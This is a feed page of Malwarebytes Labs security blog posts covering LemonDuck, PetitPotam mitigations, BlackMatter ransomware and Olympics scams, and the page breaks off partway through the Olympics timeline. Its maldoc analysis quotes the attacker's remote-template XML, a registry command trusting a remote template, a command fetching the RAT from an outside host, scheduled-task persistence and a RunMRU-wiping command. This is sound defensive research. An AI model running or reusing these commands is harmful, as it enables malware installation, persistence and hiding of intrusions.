Malware Bytes

A week in security (July 19 – August 1)

Malware Bytes Security - 10 hours 52 min ago
Last week on Malwarebytes Labs: Other cybersecurity news:
  • QR codes are here to stay. So is the tracking they allow. (Source: The New York Times)
  • NSA issues guidance on securing wireless devices in public settings. (Source: nsa.gov)
  • The greatest danger to national security has become the companies that claim to protect it. (Source: Edward Snowden)
  • The Northern Ireland COVID Certification Service was temporarily interrupted due to privacy issue. (Source: UK Department of Health)
  • BazaCall campaigns use phony call centers meaning to trick users into exfiltration and ransomware. (Source: Microsoft Security blog)
  • Solarmarker malware campaign actors are focusing their energy on credential and residual information theft. (Source: ZDNet)
  • We can’t believe people use browsers to manage their passwords, says maker of password management tools. (Source: The Register)
  • Polish police officers have arrested Belarusian nationals over ATM black-box attacks. (Source: The Record)
  • The FBI has revealed the top targeted vulnerabilities of the last two years. (Source: Bleeping Computer)
  • Officials from Israeli government agencies have raided the offices of Pegasus software vendor NSO Group, (Source: The Record)

Stay safe, everyone!

The post A week in security (July 19 – August 1) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Disaster planning with Lesley Carhart, and the slim chance of a critical infrastructure “big one”: Lock and Code S02E14

Malware Bytes Security - 14 hours 36 min ago

The 2021 attacks on two water treatment facilities in the US—combined with ransomware attacks on an oil and gas supplier and a meat and poultry distributor—could lead most people to believe that a critical infrastructure “big one” is coming.

But, as Lesley Carhart, principal threat hunter with Dragos, tells us, the chances of such an event are remarkably slim. In fact, critical infrastructure’s regular disaster planning often leads to practices that can detect, limit, or prevent any wide-reaching cyberattack.

“There’s this idea that there’s going to be this global, catastrophic event that’s going to affect everything and everyone, simultaneously, due to a cyberattack, and that’s just rather obtuse and absurd,” Carhart said.

Tune in to hear about critical infrastructure cybersecurity—how individual organizations plan for disasters, how those disasters incorporate cybersecurity events, and how the different sectors within critical infrastructure receive wildly different funding and resources—on the latest episode of Lock and Code, with host David Ruiz.

https://feed.podbean.com/lockandcode/feed.xml

You can also find us on Apple PodcastsSpotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post Disaster planning with Lesley Carhart, and the slim chance of a critical infrastructure “big one”: Lock and Code S02E14 appeared first on Malwarebytes Labs.

Categories: Malware Bytes

LemonDuck no longer settles for breadcrumbs

Malware Bytes Security - Fri, 07/30/2021 - 1:19pm

LemonDuck has evolved from a Monero cryptominer into LemonCat, a Trojan that specializes in backdoor installation, credential and data theft, and malware delivery, according to the Microsoft 365 Defender Threat Intelligence Team, which explained their findings in a two-part story [1][2] on the Microsoft Security blog.

LemonDuck

Trojan.LemonDuck has always been an advanced cryptominer that is actively being updated with new exploits and obfuscation tricks. Among others, it aims to evade detection with its fileless miner. LemonDuck’s threat to enterprises is also the fact that it’s a cross-platform threat. It’s one of a few documented bot families that targets Linux systems as well as Windows devices. Trojan.LemonDuck uses several methods for the initial infection and to propagate across networks:

  • Malspam: the email typically contains two files: a Word document exploiting CVE-2017-8570 and a zip archive with a malicious JavaScript.
  • Server Message Block (SMB) vulnerabilities: Trojan.LemonDuck leverages EternalBlue and the SMBGhost flaw to compromise a host as well as propagate to other machines within a network.
  • RDP brute-forcing: Trojan.LemonDuck’s RDP module scans for servers listening on port 3389 and tries to login as user ‘administrator’ from a list of passwords.
  • SSH brute-forcing: the Linux equivalent of RDP attacks. Trojan.LemonDuck scans for machines that are listening on port 22 and performs a brute-force attack using a list of passwords combined with the ‘root’ user name.
  • LNK vulnerability: leverages the vulnerability CVE-2017-8464 via USB removable drive that contain a malicious .LNK file.
  • ProxyLogon: an exploit for Exchange servers that allows an unauthenticated attacker to execute arbitrary commands onto vulnerable servers.

LemonDuck does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

History

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. It was named after the variable “Lemon_Duck” it utilized in one of the PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.

Evolution

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in manual post-breach involvement, which was adapted depending on the perceived value of compromised devices to the attackers. Which does not mean it stopped using the old infrastructure based on bulletproof hosting providers, which are unlikely to take any part of the LemonDuck infrastructure offline even when they are reported for malicious actions. This allows LemonDuck to persist and continue to be a threat.

LemonCat

LemonCat was named as such after two domains with the word “cat” in them (sqlnetcat[.]com, netcatkit[.]com) that LemonDuck started using in January 2021. The infrastructure that includes those domains was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. These attacks typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.

Once inside a system with an Outlook mailbox, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts. This bypasses many email security policies, for example those that forgo scanning internal mail or those that determine if an email is sent from a suspicious or unknown sender. After the emails are sent, the malware removes all traces of such activity, making it appear to the user as if nothing was sent. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Human and automated infiltration

Automated infections, like the ones from malspam, launch a PowerShell script that pulls additional scripts from the C&C server. One of the first steps the infection tries once it has gained persistence is to disable or remove a series of security products like Microsoft Defender for Endpoint, Eset, Kaspersky, Avast, Norton Security, and Malwarebytes. They also attempt to uninstall any product with “Security” and “AntiVirus” in the name.

From here the methods vary based on how attractive the target is. LemonDuck leverages a wide range of free and open-source penetration testing tools. LemonDuck uses a script at installation and then repeatedly thereafter to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts. Another tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a mimi.dat file associated with both the “Cat” and “Duck” infrastructures. This tool’s function is to facilitate credential theft for additional actions. The most common name for the infection script is IF.Bin. In conjunction with credential theft, IF.Bin drops additional .BIN files to attempt common service exploits like CVE-2017-8464 to increase privilege.

At installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via a script called KR.Bin. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.

Mitigation

Some specific and more general mitigation techniques:

  • Disallow removable storage devices on sensitive endpoints or at least disable autorun.
  • Make sure your systems are fully patched and protected against brute-force attacks aimed at popular services like SMB, SSH, RDP, SQL, and others.
  • Turn on tamper protection so malware can’t disable or uninstall your anti-malware.
  • Do not disable detection for potentially unwanted programs (PUPs) since some anti-malware classifies crypto-miners as potentially unwanted.
  • Block connections to known malicious domains and IP addresses.
  • Review your email scanning rules that are based on allowed sender addresses, since this malware can use trusted sender addresses.

Stay safe, everyone!

The post LemonDuck no longer settles for breadcrumbs appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Spear-phishing now targets employees outside the finance and executive teams, report says

Malware Bytes Security - Fri, 07/30/2021 - 11:38am

Social engineering attacks have been a longstanding concern for both individuals and organizations alike. The trend, as we know it, is that fraudsters conducting spear phishing attacks—specifically, business email compromise (BEC)are likely to target employees either in the finance or executive teams of a company as they have authority over financial matters.

This has now changed.

According to Barracuda’s latest report entitled “Spear Phishing: Top Threats and Trends” [PDF], 77 percent of employees who are in roles considered as “low profile” are now favorite spear phishing targets. Some of these employees are members of IT, who receive an average of 40 phishing emails per year, and the sales department, who receive 1 in every 5 BEC phishing emails sent the company’s way.

Bar graph of the total volume of BEC attacks aimed at certain recipients in a company
(Source: Barracuda)

“Due to the nature of their role, sales reps are used to getting external messages from senders they haven’t communicated with before. At the same time, they are all connected with payments and with other departments including finance,” says the report. “For hackers, these individuals could be a perfect entry point to get into an organization and launch other attacks.”

Although other employees are being targeted more in BEC attacks, this doesn’t mean that executives and those in finance are off the hook entirely. As you can see in the graph below, an average CEO receives 57 phishing emails on average per year.

Bar graph of the total volume of phishing attacks aimed at certain recipients in a company (Source: Barracuda)

Whether online criminals change who they target or not, one fact remains: They continue to look for the weakest link in your company, and all they need is that one click from an employee who falls for their schemes. This further highlights the importance of education and awareness efforts any company should be focusing and investing on.

Whether or not you’re part of an organization, it’s important to teach yourself to recognize the red flags of phishing attempts, both on your computer and mobile device. We got just what you need here:

Something’s phishy: How to detect phishing attempts This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.” Something else is phishy: How to detect phishing attempts on mobile phones This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

Stay safe!

The post Spear-phishing now targets employees outside the finance and executive teams, report says appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Microsoft provides more mitigation instructions for the PetitPotam attack

Malware Bytes Security - Thu, 07/29/2021 - 11:55am

In a revision of KnowledgeBase article KB5005413, Microsoft has provided more elaborate mitigation instructions for the PetitPotam attacks that were disclosed a week ago.

PetitPotam is the name for an attack method using a bug that was found by a security researcher who also published a proof-of-concept (PoC) exploit code. The attack could force remote Windows systems to reveal password hashes that could then be easily cracked. Microsoft quickly sent out an advisory for system administrators to stop using the now deprecated Windows NT LAN Manager (NTLM) to thwart an attack.

PetitPotam

PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers. It does this by performing an NTLM relay attack that does not rely on the  Microsoft’s Print System Remote Protocol (MS-RPRN) API but instead uses the EfsRpcOpenFileRaw function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely and accessible over a network. The PetitPotam PoC takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft’s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.

Pass the hash

As we saw when discussing the HiveNightmare zero-day, hashed passwords are useful to attackers. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client’s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that “mathematical operation” required to gain access. The authentication process does not require the plaintext password. The hash is enough.

So, pass the hash is the name for a technique that allows an attacker to authenticate to a remote server or service by using the hash of a user’s password, instead of requiring the associated plaintext password as is normally the case.

Hard to patch

Since the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without “breaking stuff.” Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited.

Vulnerable systems

The Microsoft advisory lists these Microsoft Server Operating Systems: Windows Server 2008, Windows Server 2008 R2, Windows Server 2016, Windows Server 2019, and Windows Server 2022. It also states that companies are vulnerable to a PetitPotam attack if NTLM authentication is enabled in their domains and/or if they are using Active Directory Certificate Services (AD CS) with the services “Certificate Authority Web Enrollment” and “Certificate Enrollment Web Service.”

New mitigation details

Microsoft has divided the mitigation techniques into a Primary part and an Additional part.

Primary

On AD CS servers open the Internet Information Services (IIS) Manager and do the following:

  • Enable Extended Protection for Authentication (EPA) for Certificate Authority Web Enrollment, “Required” being the more secure and recommended option.
  • Enable EPA for Certificate Enrollment Web Service, “Required” being the more secure and recommended option. After enabling EPA in the UI, the Web.config file created by CES role at <%windir%>\systemdata\CES\<CA Name>_CES_Kerberos\web.config should also be updated by adding <extendedProtectionPolicy> set with a value of either WhenSupported or Always depending on the Extended Protection option selected in the IIS UI.
  • Enable Require SSL, which will enable only HTTPS connections.

Additional

Disable the deprecated NTLM authentication where possible.

  • Disable NTLM Authentication on your Windows domain controller.
  • Disable NTLM on any AD CS Servers in your domain using the group policy (GPO). To configure this GPO, open Group Policy and go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options and set Network security: Restrict NTLM: Incoming NTLM traffic to Deny All Accounts or Deny All domain accounts.  If needed, you can add exceptions as necessary.
  • Disable NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the “Certificate Authority Web Enrollment” or “Certificate Enrollment Web Service” services.

Important note: After completing the above steps, you will need to restart IIS to load the changes. To restart IIS, open an elevated Command Prompt window, type the following command, and then press ENTER:

iisreset /restart

This command stops all IIS services that are running and then restarts them.

For full instructions including screenshots please look at the revised KB5005413.

The post Microsoft provides more mitigation instructions for the PetitPotam attack appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Crimea “manifesto” deploys VBA Rat using double attack vectors

Malware Bytes Security - Thu, 07/29/2021 - 11:00am

This blog post was authored by Hossein Jazi.

On July 21, 2021, we identified a suspicious document named “Манифест.docx” (“Manifest.docx”) that downloads and executes two templates: one is macro-enabled and the other is an html object that contains an Internet Explorer exploit.

While both techniques rely on template injection to drop a full-featured Remote Access Trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery. The attackers may have wanted to combine a social engineering technique with a known exploit to maximize their chances of infecting targets.

We also uncovered a panel used by the threat actors nicknamed “Ekipa” which could be translated to “team.” Victims are tracked and statistics include whether the IE exploit was successful or not.

We could not determine who might be behind this attack based on the techniques alone, but a decoy document displayed to victims may give some clues. It contains a statement from a group associating with Andrey Sergeevich Portyko and opposed to Putin’s policies on the Crimean peninsula.

Remote templates

By looking closer at the remote template embedded in settings.xml.rels we noticed that it contains a full featured VBA Rat that performs the following actions:

  • Collects victim’s info
  • Identifies the AV product running on a victim’s machine
  • Executes shell-codes
  • Deletes files
  • Uploads and downloads files
  • Reads disk and file systems information

The second template is embedded in Document.xml.rels and is loaded into the document. Looking at the loaded code we noticed that it contains an IE Exploit (CVE-2021-26411) that was once used by Lazarus APT to target security researchers working on vulnerability disclosure, as reported by the threat research teams at Google and Microsoft. The shell-code executed using this exploit deploys the same VBA Rat that was loaded using remote template injection.

After loading the remote templates the malicious document loads a decoy document in Russian which is pretty interesting. The decoy document is a statement from a group within Crimea that voices opposition to Russia and specifically Putin’s policies against that peninsula. In the following, you can see this statement in both Russian and English language.

Figure 1: Decoy document Document Analysis

The malicious document (“Манифест.docx”) contains two templates in settings.xml.rels and document.xml.rels. The remote template that is located in settings.xml.rels downloads a macro weaponized template and loads it into current document. This remote template contains a macro code with full-featured Rat functionality. We provide the analysis of this VBA Rat in the next section.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="HtTpS:\\cloud-documents.com/doc/t.php?action=show_content" TargetMode="External"/></Relationships>

The second template is embedded in document.xml.rels and will be loaded in an object in the main document. This template contains an exploit code for CVE-2021-26411.

Figure 2: Document.xml.rels

This exploit code used by this remote template is almost similar to what has been reported by ENKI security firm.

Figure 3: Exploit code

The shell-code executed by this exploit deploys the same VBA Rat that is also loaded using the remote template embedded in settings.xml.rels. In fact, the actor tries to deploy its VBA Rat using two different methods.
The shell-code is very simple and performs the following actions. The shell-code is written in the AutoHotKey scripting language and all of its actions are executed using SendInput API call.

  • Add VBA Rat as Trusted document to TrustedRecords registry key. By adding this Rat to this registry there won’t be any need to enable the macro when this document will be opened next time.
    reg add \"HKCU\\SOFTWARE\\Microsoft\\Office\\16.0\\Word\\Security\\Trusted Documents\\TrustRecords\" /V https://cloud-documents.com/doc/templates/agent.dotm /t REG_BINARY /d 00000000000000000040230e43000000f9d99c01ffffff7f /f"
  • Get the VBA Rat using: Winword /w https://cloud-documents.com/doc/t.php?document_show=notica
  • Make this VBA Rat persistence by creating a Scheduled task to execute it every minute:
    SCHTASKS /Create /SC MINUTE /MO 1 /TN \"z\" /TR winword.exe ' /q /w %appdata%\Microsoft\Word\Startup\_.dotm
  • Delete RunMru registry value to clear its track records.
    Reg delete HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMru \f
VBA Rat analysis (Remote Template)

The remote template contains Document_Open and Document_Close which are activated upon opening and closing the document.

Document_Open:

The Document_open function checks if the active document has the docx extension and if that is the case it shows the hidden content (decoy content). Then, if the active document name is "_.dotm" (this is the case when the machine is already infected with this Rat), it calls "ConnectCP" function. The ConnectCP function is responsible for collecting victim’s info by calling the following functions as well as a value named "cve" in CustomDocumentProperties (this value is being set during the first execution of this document).

After collecting data, it converts it into a json format by using the JsonConvertor function. The collected data later is used by the SCI function to be sent to the server and receive commands.

  • getUUID: Gets UUID by executing "SELECT * FROM Win32_ComputerSystemProduct"
  • getOS: Gets OS type by executing "SELECT * FROM Win32_OperatingSystem"
  • arch: Returns OS architecture
  • getCPU: Gets CPU info by executing "SELECT * FROM Win32_Processor"
  • getGPU: Gets GPU info by executing "SELECT * FROM Win32_VideoController"
  • getRAM: Gets physical memory capacity by executing "SELECT * FROM Win32_PhysicalMemory"
  • getStorage: Gets available hard drive space by executing "Select * from Win32_LogicalDisk Where DriveType = 3"
  • getName: Gets computer name, user name and domain name
  • getRole: Identify if the victim has admin role or not.
Figure 4: GetRole
  • getAV: Gets Anti-Virus product info including the AV name, AV status (enabled or disabled) and AV signature stature (outdated or actual). To get these info it executes "Select * from AntiVirusProduct" to get the list of active Anti Virus products and then calls DisplayName to get the AV name and then identify the AV status and AV signature status using the product state codes. As an example if the product state code is 266240, it means that the AV product is enabled and its signature is updated.
Figure 5: GetAV

At the end, the ConnectCP function calls the StartTimer function to start the task execution procedure (ExecuteTasks function). This function creates a timer that calls the ExecuteTasks function every 10 minutes to execute the tasks received from the server.

Figure 6: Set Timer

If the active document name is not "_.dotm" (The machine has not been infected before with this VBA Rat), it calls a function named InstallFromExp after making sure it is not running within a Sandbox environment and its extension is dotm. The attacker checks the value of the following registry key and if the value is equal to one it won’t execute the InstallFromExp.

HKCU\Software\Microsoft\Office\&Application.Version&\Excel\Security\VBAWarnings

The value one for this registry key means that all untrusted and trusted macros are allowed to run without any notification which usually is a default setting for sandbox environments to run macro embedded documents automatically.

InstallFromExp performs the basic initialization of this Rat which includes the following three actions:

  • Sets the customDocumentProperties named "cve" to “2021-26411”.
  • Makes itself persistence by adding itself to word startup directory with "_.dotm" name: APPDATA\Microsoft\Word\StartUp\_.dotm
  • Cleans up its track records by deleting RunMRU registry key
  • Exits the program
Document_Close

This function also performs the installation of the Rat but by calling a different function: InstallFromMacro. Before calling the installation function it calls the same Sandbox function to make sure it is not running into a sandbox environment and then checks if the path of the attached template includes http to make sure it has an embedded remote template url.

InstallFromMacro performs initialization of the Rat which includes the following three actions:

  • Opens the attached remote template as a document and extract the contents of the comments section of the BuiltInDocumentProperties and spilts it by “|”. If the OS is 32 bit it takes the first part of the the comments and puts it in skd variable and if the OS is 64 bit it takes the second part of the comments section and puts it into skd. The skd variable later is used as a parameter for AddTask function.
  • Sets the customDocumentProperties named “cve” to “MACRO”.
  • Make itself persistence by adding itself to word startup directory with “_.dotm” name: APPDATA\Microsoft\Word\StartUp\_.dotm
  • Calls AddTask function
  • Cleans up its track records by deleting RunMRU registry key
Figure 7: Rat installation AddTask (Shell-Code execution using EnumWindows)

This function base64 decodes the content from the skd variable that has been set in InstallFromMacro function and executes it using VirtualProtect and EnumWindows. In fact the content of the skd is a small shell-code that has been executed within the memory without being written into disk. The actor has used an interesting API call for ShellCode execution. Instead of using well known API calls for shell code execution which can easily get flagged by AV products such as VirtualAlloc, WriteProcessMemory, and CreateThread the actor has used EnumWindows to execute its shell-code.

The second argument of EnumWindows is an application-defined value to be passed to the callback function. By providing the address of the shell-code from VirtualProtect as second parameter to this function, it can execute the Shell-code.

Figure 8: AddTask

The executed shell-code is very small and it just persists by creating a Scheduled task to execute it every minute:

SCHTASKS /Create /SC MINUTE /MO 1 /TN \"z\" /TR winword.exe ' /q /w %appdata%\Microsoft\Word\Startup\_.dotm

Similar to the shell-code used in IE exploit, this shell-code is also written using AutoHotKey scripting language and it is using SendmessageA and SendInput to simulate keystrokes and perform its actions.

Figure 9: Shell-code API and function calls resolving ExecuteTasks

This is the main function of this VBA Rat that receives the command from the server in Json format and then parses the json file and executes the command. Each time this function can execute three tasks. This has probably been set to avoid making noise in network activities which might be detected by security products.

Figure 10: Executes tasks

To receive the tasks from the server this function receives one argument which is a function named SCI. SCI function sends the collected data by ConnectCP function in json format in a HTTP POST request and receives the response from the server which includes the tasks that need to be executed in JSON format.

Figure 11: Send info to server and receive commands

Here is the list of commands that can be executed by this Rat. After executing each task the results of task execution will be sent to server.

ReadDisks

It gets each Drive information on the machine using Scripting.FileSystemObject.Drives object. It then creates a JSON object which includes the following key and values for each drive object:

  • IsReady: this value sets to true if the drive is ready
  • Label: gets name of the drive which will be either ShareName or VolumeName. This depends on whether the drive is remote or not
  • Filesystem: gets the file system in use for the drive
  • Freespace: gets the amount of free space for the drive in KB
  • Name: gets the drive letter
  • IsDirectory: This value is always True
Figure 12: Read Disks ReadFileSystem

This function gets a Folder object corresponding to the folder in a specified path using Scripting.FileSystemObject.GetFolder object and then extracts it name, size, date last modified and puts them into a Json object. It also extracts the same information for all sub-folders and files in that Folder object and adds them to the Json object.

Download File

This function reads a specified file using Adobe.Recordset and sends the data to sever using HTTP POST request.

Figure 13: Download File Upload File

This module receives a file from the server and writes it into specified file.

Figure 14: Upload File DeleteFile

This function uses Kill function to delete the specified file or directory.

Terminate

This function terminates the execution of the Rat and exits the application.

Execute

This function executes the received shell-code from the server using the same method used in AddTask function in which it has used VirtualProtect and EnumWindows to execute the shell-code.

Figure 15: Execute Shell-code ChangeTiming

This function resets the timer that is used to execute tasks every 10 minutes by calling EndTimer to kill the timer and then calling StartTimer to start a new timer.

Figure 16: Send results Attacker panel

We were able to access to the panel used by the attacker. The panel’s main page includes the list of victims with some information about them including: IP address, date and time, NTLM, Windows version, Windows Architecture, Office version, Office architecture, IE version, Exploited (shows if the IE zero day was successful or not), Loader (shows if the VBA Rat successfully executed or not) and note.

Figure 17: The panel

The panel is written in PHP with a backed SQL database to store data. This install.php initializes the SQL database.

Figure 18: Install.php

stats.php is the file that performs the main actions of this Rat that matches the functionalities we reported here. It also has some more functions including: delete_task, disable_task, enable_task, show_tasks, add_task, format_task and add_user.

Figure 19: Stats.php Figure 20: Stats.php Conclusion

In this blog post we have analyzed an attack in which threat actors have used two different methods to infect their victims. Both techniques have been loaded by malicious documents using the template injection technique. The first template contains a url to download a remote template that has an embedded full-featured VBA Rat. This Rat has several different capabilities including downloading, uploading and executing files. The second template is an exploit for CVE-2021-26411 which executes a shell-code to deploy the same VBA Rat. The VBA Rat is not obfuscated but still has used some interesting techniques for shell-code injection.

As the conflict between Russia and Ukraine over Crimea continues, cyber attacks have been increasing as well. The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag.

IOCs

Maldocs:
03eb08a930bb464837ede77df6c66651d526bab1560e7e6e0e8466ab23856bac
0661fc4eb09e99ba4d8e28a2d5fae6bb243f6acc0289870f9414f9328721010a

Remote template:
fffe061643271155f29ae015bca89100dec6b4b655fe0580aa8c6aee53f34928

C2 server:
cloud-documents[.]com

The post Crimea “manifesto” deploys VBA Rat using double attack vectors appeared first on Malwarebytes Labs.

Categories: Malware Bytes

BlackMatter, a new ransomware group, claims link to DarkSide, REvil

Malware Bytes Security - Wed, 07/28/2021 - 5:08pm

There’s a new ransomware gang in town—and, frankly, we’re not at all surprised.

After DarkSide disappeared—coincidentally, immediately after Colonial Pipeline gave in to the group’s ransom demand of roughly $5M USD worth in Bitcoin—a new ransomware group who calls themselves BlackMatter surfaced on the dark web, kicking off their operations sometime this week.

Analysts from Recorded Future, the cybersecurity group who initially reported on the new ransomware group, said their researchers are currently investigating BlackMatter. Though it is a fairly new cybercriminal gang, its members could be considered professionals in Ransomware-as-a-service (RaaS) as, to quote from BlackMatter themselves, “The project has incorporated in itself the best features of DarkSide, REvil, and LockBit.”

The BlackMatter group has been spotted posting on Exploit and XSS, two known cybercrime forums in the dark web. They’re not advertising their ransomware, however; they are recruiting affiliates that are called “initial access brokers,” a term that cybergangs use to refer to fellow criminals who have access to hacked enterprise networks. According to BlackMatter’s ads, the ransomware group is seeking hacked access to “corporate networks” located in Australia, Canada, the UK, and the US.

A screen capture of BlackMatter’s post on the Exploit forum (Source: Insikt Group, Recorded Future)

The new ransomware gang made it clear that they will not be targeting certain organizations, almost as if to say that they are keenly aware of the danger that comes from pulling off internationally-recognized attacks which can lead—and have led—to sudden shutdowns and disappearances.

BlackMatter’s leak site. It’s essentially a blank slate apart from an “About Us” and “Rules” sections. (Source: Malwarebytes)

In their own leak site, BlackMatter claim not to attack companies belonging to the following six industries, with the caveat that if or when any companies in these industries do get hit, such victims should simply ask for a free decryption:

“* Hospitals.
* Critical infrastructure facilities (nuclear power plants, power plants, water treatment facilities).
* Oil and gas industry (pipelines, oil refineries).
* Defense industry.
* Non-profit companies.
* Government sector.”

At the moment, BlackMatter has not made any move to attack organizations yet. Perhaps it won’t be long now.

Malwarebytes Labs will keep an eye on BlackMatter and continue to report about it in the future, not forgetting that AvosLocker, another new ransomware variant that popped up roughly in late June or early July, is also currently looking for affiliates they can work with; and, last but not the least, Haron, a potential offshoot of Avaddon and Thanos ransomware operations.

The post BlackMatter, a new ransomware group, claims link to DarkSide, REvil appeared first on Malwarebytes Labs.

Categories: Malware Bytes

The Olympics: a timeline of scams, hacks, and malware

Malware Bytes Security - Wed, 07/28/2021 - 12:52pm

The 2020 Olympics are, after a bit of a delayed start, officially in full swing. So too is the possibility for scammers to crawl out of the woodwork. And while actual, measurable cyberrattacks and hacks surrounding The Olympics did not truly get rolling until 2008 in Beijing, The Olympic games have traditionally been quite the target for malicious acts of all kinds, dating back years. Shall we take a look?

1996 Atlanta

No sign of cyberattacks yet. A disaster is alluded to, but the disaster in question is down to slow websites for surfers, and faulty data transmission at the event itself. People getting up to mischief? Not so much.

2000 Sydney

You may (or may not!) remember Sydney being referred to as “The Internet Olympics”. It was also the first major Olympics event where organizers braced for hacking related impact. I recall quite a lot of articles at the time predicting all manner of doom and gloom scenarios. I’m sure Y2K bug fever didn’t help douse the fires of suspicion that things were about to go awry.

As it turns out, things did not go awry. A non-hacked games were enjoyed by all. Phew.

2002 Salt Lake City

By the time of the 2002 Olympics, experts responsible for locking down the winter event were in good spirits. Nothing happened at the 2000 games, and it seems nothing happened at any earlier events either. Once again, the primary concern outside security was reliability and hoping massively complex networks wouldn’t fall over during the games proper.

2004 Athens

The most interesting cyber story in the build up to the 2004 games was an infamous wiretapping incident in Athens. Some folks maintain there’s a strong possibility it was designed to grab all manner of calls from VIPs during the games. We’ll almost certainly never know for sure.

2006 Turin

This is spectacular (and you really should click, because it’s hard to put into words what is on view here). As you can see, things still aren’t really all that cyber in Olympics land. That’s about to change, however…

2008 Beijing

The Beijing Olympics are notable for what may be the first real slice of cyberattacks aimed at the games. Former Chief Executive of the British Olympic Association feared they’d been compromised. A number of sports-related organizations, including various National Olympic Commitees, the World Anti-Doping Agency, and the International Olympic Committee, were all targeted by “Operation Shady Rat,” according to McAfee. While unrelated organizations were also targeted over a five-year period, this definitely isn’t what anybody needs prior to an Olympic games.

An article from the time claims the “English language version” of the Olympics site was apparently compromised and redirected to some sort of loan company portal. However, there are so many official and unofficial sites from the time, it’s difficult to say what exactly that site is. Is it a fan site? A real portal? Did the article typo the URL? I’m not sure, and I can’t find it being mentioned anywhere else. We’re on less shaky ground with this tale of banner color alteration, in which it was claimed that color alterations made to a website were purposeful hacks meant to highlight human rights abuses.

There’s also an incredibly comprehensive run-down of hack-related happenings during the 2008 games here. In just two years, we’ve gone from “not much happening here, is there?” to “RED ALERT, THIS IS NOT A DRILL”. Fake ticket websites, bogus streams, websites belonging to athletes hacked, site defacements, and more.

Away from the official games content itself, people were targeted by other means. All of a sudden we have infectious email attachments, and compromised third-party sites serving up malware. Wherever you looked, there was a threat sprinting into view.

Hacking may have been slow off the blocks, but it was definitely an unofficial event by this point.

2010 Vancouver

I couldn’t really find much for the Vancouver Winter Olympics. The most interesting incident was probably a fake opening ceremonies website serving infections, via promotion from a bogus Twitter account. Not spectacular by any means, but one of the first examples of using Twitter as a jumping-off point for attacks during a major event.

2012 London

The London Olympics—the one where James Bond and the definitely real Queen jumped out of a helicopter—was a massive splash of malicious activity in internet terms.

By this point, security drills and planning were a major component of the games. I seem to recall reading about Canada doing extensive testing in the build-up to Vancouver, and simulated attacks detailed here were probably building on those efforts. According to that article, China was “subject to about 12 million online attacks per day” during the 2008 games. War-gaming and using “an in-house team of pretend hackers,” as they put it, makes a lot of sense.

Articles warning of dangers mainly focused on search engine poisoning (still a threat back in 2012), fake sites, streaming, and once again Twitter makes an appearance as “one to watch.” There’s also the occasional warning about dubious Wi-Fi hotspots.

In terms of actual attacks which took place, we see the rise of mobile as a way in for Olympics scams. Russian sites hosted Trojans claiming to be official 2012 game apps. Yes, games thrown into the mix alongside mobile. What a combo! Email spam promising free airline tickets to see the games is a timeless social media scam also repackaged for this sporting event. Here, you’d get nothing but survey scams.

